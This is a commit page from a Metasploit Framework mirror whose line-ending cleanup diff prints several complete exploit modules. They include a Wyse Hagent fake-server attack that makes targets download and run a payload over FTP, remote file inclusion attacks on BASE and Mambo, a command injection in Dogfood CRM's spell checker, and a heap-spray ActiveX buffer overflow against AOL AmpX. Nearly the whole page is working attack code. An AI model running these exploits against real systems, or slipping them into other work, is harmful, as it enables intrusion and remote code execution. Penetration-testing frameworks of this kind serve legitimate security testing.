dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

get rid of some more ^Ms 

git-svn-id: file:///home/svn/framework3/trunk@7880 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
James Lee 2009-12-15 18:47:29 +00:00
parent 48c3709a25
commit 2570fcee15
27 changed files with 2949 additions and 2943 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

472
modules/exploits/multi/wyse/hagent_untrusted_hsdata.rb
View File

@ -1,239 +1,239 @@
##
# $Id: hagent_untrusted_hsdata.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'timeout'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id: hagent_untrusted_hsdata.rb
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'timeout'
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision$',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Payload' =>
{
'Space' => 2048,
'BadChars' => '',
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'Privileged' => true
))
register_options([
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end
def exploit
if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end
# Connect to the target service
print_status("Connecting to the target")
connect()
# Start the FTP service
print_status("Starting the FTP server")
start_service()
# Create the executable with our payload
print_status("Generating the EXE")
if target['Platform'] == 'win'
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"
end
@exe_sent = false
# Start the HTTP service
print_status("Starting the HTTP service")
wdmserver = Rex::Socket::TcpServer.create({
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
})
wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")
fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
pwn2 =
"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
if target['Platform'] == 'win'
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: " + resp)
print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")
case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true
when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
end
print_status("Sending reply: #{res}")
session.put(res)
session.close
end
end
rescue ::Timeout::Error
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
return
end
print_status("Waiting on the FTP request...")
stime = Time.now.to_f
while(not @exe_sent)
break if (stime + 90 < Time.now.to_f)
select(nil, nil, nil, 0.25)
end
if(not @exe_sent)
print_status("No executable sent :(")
end
stop_service()
wdmserver.close()
handler
disconnect
end
def on_client_command_retr(c,arg)
print_status("#{@state[c][:name]} FTP download request for #{arg}")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(@exe_file)
c.put("226 Transfer complete.\r\n")
conn.close
@exe_sent = true
end
def on_client_command_size(c,arg)
print_status("#{@state[c][:name]} FTP size request for #{arg}")
c.put("213 #{@exe_file.length}\r\n")
end
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::FtpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Wyse Rapport Hagent Fake Hserver Command Execution',
'Description' => %q{
This module exploits the Wyse Rapport Hagent service by pretending to
be a legitimate server. This process involves starting both HTTP and
FTP services on the attacker side, then contacting the Hagent service of
the target and indicating that an update is available. The target will
then download the payload wrapped in an executable from the FTP service.
},
'Stance' => Msf::Exploit::Stance::Aggressive,
'Author' => 'kf',
'Version' => '$Revision$',
'References' =>
[
['CVE', '2009-0695'],
['OSVDB', '55839'],
['US-CERT-VU', '654545'],
['URL', 'http://snosoft.blogspot.com/'],
['URL', 'http://www.theregister.co.uk/2009/07/10/wyse_remote_exploit_bugs/'],
['URL', 'http://www.wyse.com/serviceandsupport/support/WSB09-01.zip'],
['URL', 'http://www.wyse.com/serviceandsupport/Wyse%20Security%20Bulletin%20WSB09-01.pdf'],
],
'Payload' =>
{
'Space' => 2048,
'BadChars' => '',
},
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Targets' =>
[
[ 'Windows XPe x86',{'Platform' => 'win',}],
[ 'Wyse Linux x86', {'Platform' => 'linux',}],
],
'DefaultTarget' => 0,
'Privileged' => true
))
register_options([
OptPort.new('SRVPORT', [ true, "The local port to use for the FTP server", 21 ]),
Opt::RPORT(80),
], self.class)
end
def exploit
if(datastore['SRVPORT'].to_i != 21)
print_error("This exploit requires the FTP service to run on port 21")
return
end
# Connect to the target service
print_status("Connecting to the target")
connect()
# Start the FTP service
print_status("Starting the FTP server")
start_service()
# Create the executable with our payload
print_status("Generating the EXE")
if target['Platform'] == 'win'
@exe_file = Msf::Util::EXE.to_win32pe(framework, payload.encoded)
maldir = "C:\\" # Windows
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".exe"
co = "XP"
elsif target['Platform'] == 'linux'
@exe_file = Msf::Util::EXE.to_linux_x86_elf(framework, payload.encoded)
maldir = "//tmp//" # Linux
malfile = Rex::Text.rand_text_alphanumeric(rand(8)+4) + ".bin"
co = "LXS"
end
@exe_sent = false
# Start the HTTP service
print_status("Starting the HTTP service")
wdmserver = Rex::Socket::TcpServer.create({
'Context' => {
'Msf' => framework,
'MsfExploit' => self
}
})
wdmserver_port = wdmserver.getsockname[2]
print_status("Starting the HTTP service on port #{wdmserver_port}")
fakerapport = Rex::Socket.source_address(rhost)
fakemac = "00" + Rex::Text.rand_text(5).unpack("H*")[0]
mal = "&V54&CI=3|MAC=#{fakemac}|IP=#{rhost}MT=3|HS=#{fakerapport}|PO=#{wdmserver_port}|"
# FTP Credentials
ftpserver = Rex::Socket.source_address(rhost)
ftpuser = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftppass = Rex::Text.rand_text_alphanumeric(rand(8)+1)
ftpport = 21
ftpsecure = '0'
incr = 10
pwn1 =
"&UP0|&SI=1|UR=9" +
"|CO \x0f#{co}\x0f|#{incr}" +
# "|LU \x0fRapport is downloading HAgent Upgrade to this terminal\x0f|#{incr+1}" +
"|SF \x0f#{malfile}\x0f \x0f#{maldir}#{malfile}\x0f|#{incr+1}"
pwn2 =
"|EX \x0f//bin//chmod\xfc+x\xfc//tmp//#{malfile}\x0f|#{incr+1}"
pwn3 =
"|EX \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# "|RB|#{incr+1}" +
# "|SV* \x0fHKEY_LOCAL_MACHINE\\Software\\Rapport\\pwnt\x0f 31337\x0f\x0f REG_DWORD\x0f|#{incr+1}" +
#"|DF \x0f#{maldir}#{malfile}\x0f|#{incr+1}" +
# FTP Paramaters
"|&FTPS=#{ftpserver}" + "|&FTPU=#{ftpuser}" + "|&FTPP=#{ftppass}" + "|&FTPBw=10240" + "|&FTPST=200" + "|&FTPPortNumber=#{ftpport}" + "|&FTPSecure=#{ftpsecure}" +
"|&M_FTPS=#{ftpserver}" + "|&M_FTPU=#{ftpuser}" + "|&M_FTPP=#{ftppass}" + "|&M_FTPBw=10240" + "|&M_FTPST=200" + "|&M_FTPPortNumber=#{ftpport}" + "|&M_FTPSecure=#{ftpsecure}" +
# No clue
"|&DP=1|&IT=3600|&CID=7|QUB=3|QUT=120|CU=1|"
if target['Platform'] == 'win'
pwn = pwn1 + pwn3
elsif target['Platform'] == 'linux'
pwn = pwn1 + pwn2 + pwn3
end
# Send the malicious request
sock.put(mal)
# Download some response data
resp = sock.get_once(-1, 10)
print_status("Received: " + resp)
print_status("Waiting on a connection to the HTTP service")
begin
Timeout.timeout(190) do
done = false
while (not done and session = wdmserver.accept)
req = session.recvfrom(2000)[0]
next if not req
next if req.empty?
print_status("HTTP Request: #{req.split("\n")[0].strip}")
case req
when /V01/
print_status("++ connected (#{session.peerhost}), " + "sending payload (#{pwn.size} bytes)")
res = pwn
when /V02/
print_status("++ device sending V02 query...")
res = "&00|Existing Client With No Pending Updates|&IT=10|&CID=7|QUB=3|QUT=120|CU=1|"
done = true
when /V55/
print_status("++ device sending V55 query...")
res = pwn
when /POST/ # PUT is used for non encrypted requests.
print_status("++ device sending V55 query...")
res = pwn
done = true
else
print_status("+++ sending generic response...")
res = pwn
end
print_status("Sending reply: #{res}")
session.put(res)
session.close
end
end
rescue ::Timeout::Error
print_status("Timed out waiting on the HTTP request")
wdmserver.close
disconnect()
stop_service()
return
end
print_status("Waiting on the FTP request...")
stime = Time.now.to_f
while(not @exe_sent)
break if (stime + 90 < Time.now.to_f)
select(nil, nil, nil, 0.25)
end
if(not @exe_sent)
print_status("No executable sent :(")
end
stop_service()
wdmserver.close()
handler
disconnect
end
def on_client_command_retr(c,arg)
print_status("#{@state[c][:name]} FTP download request for #{arg}")
conn = establish_data_connection(c)
if(not conn)
c.put("425 Can't build data connection\r\n")
return
end
c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
conn.put(@exe_file)
c.put("226 Transfer complete.\r\n")
conn.close
@exe_sent = true
end
def on_client_command_size(c,arg)
print_status("#{@state[c][:name]} FTP size request for #{arg}")
c.put("213 #{@exe_file.length}\r\n")
end
end

142
modules/exploits/unix/webapp/base_qry_common.rb
View File

@ -1,72 +1,72 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'BASE base_qry_common Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php file in BASE 1.2.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-2685' ],
[ 'BID', '18298' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jun 14 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
], self.class)
end
def php_exploit
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
print_status("Trying uri #{uri}")
response = send_request_raw( {
'global' => true,
'uri' => uri,
},timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'BASE base_qry_common Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
the base_qry_common.php file in BASE 1.2.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2006-2685' ],
[ 'BID', '18298' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jun 14 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/base/base_qry_common.php?BASE_path=!URL!"]),
], self.class)
end
def php_exploit
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
print_status("Trying uri #{uri}")
response = send_request_raw( {
'global' => true,
'uri' => uri,
},timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end

192
modules/exploits/unix/webapp/dogfood_spell_exec.rb
View File

@ -1,97 +1,97 @@
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dogfood CRM spell.php Remote Command Execution',
'Description' => %q{
This module exploits a previously unpublished vulnerability in the
Dogfood CRM mail function which is vulnerable to command injection
in the spell check feature. Because of character restrictions, this
exploit works best with the double-reverse telnet payload. This
vulnerability was discovered by LSO and affects v2.0.10.
},
'Author' => [
'LSO <lso@hushmail.com>', # Exploit module
'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '54707' ],
[ "URL", "http://downloads.sourceforge.net/dogfood/" ],
],
'Privileged' => false,
'Platform' => ['unix'], # patrickw - removed win, linux -> untested
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
], self.class)
end
def check
res = send_request_raw(
{
'uri' => datastore['URIPATH'],
}, 1)
if (res.body =~ /Spell Check complete/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
timeout = 1
cmd = payload.encoded
data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
uri = datastore['URIPATH']
response = send_request_cgi(
{
'uri' => uri,
'method' => "POST",
'data' => data
},
timeout)
handler
end
end
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dogfood CRM spell.php Remote Command Execution',
'Description' => %q{
This module exploits a previously unpublished vulnerability in the
Dogfood CRM mail function which is vulnerable to command injection
in the spell check feature. Because of character restrictions, this
exploit works best with the double-reverse telnet payload. This
vulnerability was discovered by LSO and affects v2.0.10.
},
'Author' => [
'LSO <lso@hushmail.com>', # Exploit module
'patrick', # Added check code, QA tested ok 20090303, there are no references (yet).
],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '54707' ],
[ "URL", "http://downloads.sourceforge.net/dogfood/" ],
],
'Privileged' => false,
'Platform' => ['unix'], # patrickw - removed win, linux -> untested
'Arch' => ARCH_CMD,
'Payload' =>
{
'Space' => 1024,
'DisableNops' => true,
'BadChars' => %q|'"`|, # quotes are escaped by PHP's magic_quotes_gpc in a default install
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic perl ruby bash telnet',
}
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('URIPATH', [ true, "The URI of the spell checker", '/dogfood/mail/spell.php']),
], self.class)
end
def check
res = send_request_raw(
{
'uri' => datastore['URIPATH'],
}, 1)
if (res.body =~ /Spell Check complete/)
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
timeout = 1
cmd = payload.encoded
data = "data=#{Rex::Text.uri_encode('$( '+ cmd + ' &)x')}"
uri = datastore['URIPATH']
response = send_request_cgi(
{
'uri' => uri,
'method' => "POST",
'data' => data
},
timeout)
handler
end
end

144
modules/exploits/unix/webapp/mambo_cache_lite.rb
View File

@ -1,73 +1,73 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
4.6.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-2905' ],
[ 'BID', '29716' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jun 14 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
], self.class)
end
def php_exploit
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
print_status("Trying uri #{uri}")
response = send_request_raw( {
'global' => true,
'uri' => uri,
},timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::PHPInclude
def initialize(info = {})
super(update_info(info,
'Name' => 'Mambo Cache_Lite Class mosConfig_absolute_path Remote File Include.',
'Description' => %q{
This module exploits a remote file inclusion vulnerability in
includes/Cache/Lite/Output.php in the Cache_Lite package in Mambo
4.6.4 and earlier.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2008-2905' ],
[ 'BID', '29716' ],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
'Compat' =>
{
'ConnectionType' => 'find',
},
'Space' => 32768,
},
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Automatic', { }]],
'DisclosureDate' => 'Jun 14 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('PHPURI', [true, "The URI to request, with the include parameter changed to !URL!", "/includes/Cache/Lite/Output.php?mosConfig_absolute_path=!URL!"]),
], self.class)
end
def php_exploit
timeout = 0.01
uri = datastore['PHPURI'].gsub('!URL!', Rex::Text.to_hex(php_include_url, "%"))
print_status("Trying uri #{uri}")
response = send_request_raw( {
'global' => true,
'uri' => uri,
},timeout)
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
handler
end
end

236
modules/exploits/windows/browser/aol_ampx_convertfile.rb
View File

@ -1,121 +1,121 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX
class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.
By setting an overly long value to 'ConvertFile()', an attacker can overrun
a buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [
'rgod <rgod[at]autistici.org>', # Original exploit [see References]
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
],
'Version' => '$Revision$',
'References' =>
[
include Msf::Exploit::Remote::HttpServer::HTML
def initialize(info = {})
super(update_info(info,
'Name' => 'AOL Radio AmpX ActiveX Control ConvertFile() Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in AOL IWinAmpActiveX
class (AmpX.dll) version 2.4.0.6 installed via AOL Radio website.
By setting an overly long value to 'ConvertFile()', an attacker can overrun
a buffer and execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [
'rgod <rgod[at]autistici.org>', # Original exploit [see References]
'Trancer <mtrancer[at]gmail.com>' # Metasploit implementation
],
'Version' => '$Revision$',
'References' =>
[
[ 'OSVDB', '54706' ],
[ 'BID', '35028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'May 19 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
blocksize = 0x40000
fillto = 500
offset = target['Offset']
# Randomize the javascript variable names
ampx = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
j_ret = rand_text_alpha(rand(100) + 1)
j_eax = rand_text_alpha(rand(100) + 1)
j_bof = rand_text_alpha(rand(100) + 1)
# Build out the message
content = %Q|
<html>
<OBJECT classid='clsid:FE0BD779-44EE-4A4B-AA2E-743C63F2E5E6' id='#{ampx}'></OBJECT>
<script language='javascript'>
#{j_shellcode}=unescape('#{shellcode}');
#{j_nops}=unescape('#{nops}');
#{j_headersize}=20;
#{j_slackspace}=#{j_headersize}+#{j_shellcode}.length;
while(#{j_nops}.length<#{j_slackspace})#{j_nops}+=#{j_nops};
#{j_fillblock}=#{j_nops}.substring(0,#{j_slackspace});
#{j_block}=#{j_nops}.substring(0,#{j_nops}.length-#{j_slackspace});
while(#{j_block}.length+#{j_slackspace}<#{blocksize})#{j_block}=#{j_block}+#{j_block}+#{j_fillblock};
#{j_memory}=new Array();
for(#{j_counter}=0;#{j_counter}<#{fillto};#{j_counter}++)#{j_memory}[#{j_counter}]=#{j_block}+#{j_shellcode};
#{j_eax}='';
for(#{j_counter}=0;#{j_counter}<=350;#{j_counter}++)#{j_eax}+=unescape('%FF%FF%FF%FF');
#{j_ret}='';
for(#{j_counter}=0;#{j_counter}<=#{offset};#{j_counter}++)#{j_ret}+=unescape('#{ret}');
#{j_bof}=#{j_eax}+#{j_ret};
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
#{ampx}.ConvertFile(#{j_bof},1,1,1,1,1);
</script>
</html>
|
print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
# Transmit the response to the client
send_response_html(cli, content)
# Handle the payload
handler(cli)
end
[ 'BID', '35028' ],
[ 'URL', 'http://www.milw0rm.com/exploits/8733' ],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'process',
},
'Payload' =>
{
'Space' => 1024,
'BadChars' => "\x00\x09\x0a\x0d'\\",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP0-SP3 / Windows Vista SP0-SP1 / IE 6.0 SP0-2 & IE 7.0', { 'Offset' => 250, 'Ret' => 0x0C0C0C0C } ]
],
'DisclosureDate' => 'May 19 2009',
'DefaultTarget' => 0))
end
def autofilter
false
end
def check_dependencies
use_zlib
end
def on_request_uri(cli, request)
# Re-generate the payload
return if ((p = regenerate_payload(cli)) == nil)
# Encode the shellcode
shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))
# Setup exploit buffers
nops = Rex::Text.to_unescape([target.ret].pack('V'))
ret = Rex::Text.uri_encode([target.ret].pack('L'))
blocksize = 0x40000
fillto = 500
offset = target['Offset']
# Randomize the javascript variable names
ampx = rand_text_alpha(rand(100) + 1)
j_shellcode = rand_text_alpha(rand(100) + 1)
j_nops = rand_text_alpha(rand(100) + 1)
j_headersize = rand_text_alpha(rand(100) + 1)
j_slackspace = rand_text_alpha(rand(100) + 1)
j_fillblock = rand_text_alpha(rand(100) + 1)
j_block = rand_text_alpha(rand(100) + 1)
j_memory = rand_text_alpha(rand(100) + 1)
j_counter = rand_text_alpha(rand(30) + 2)
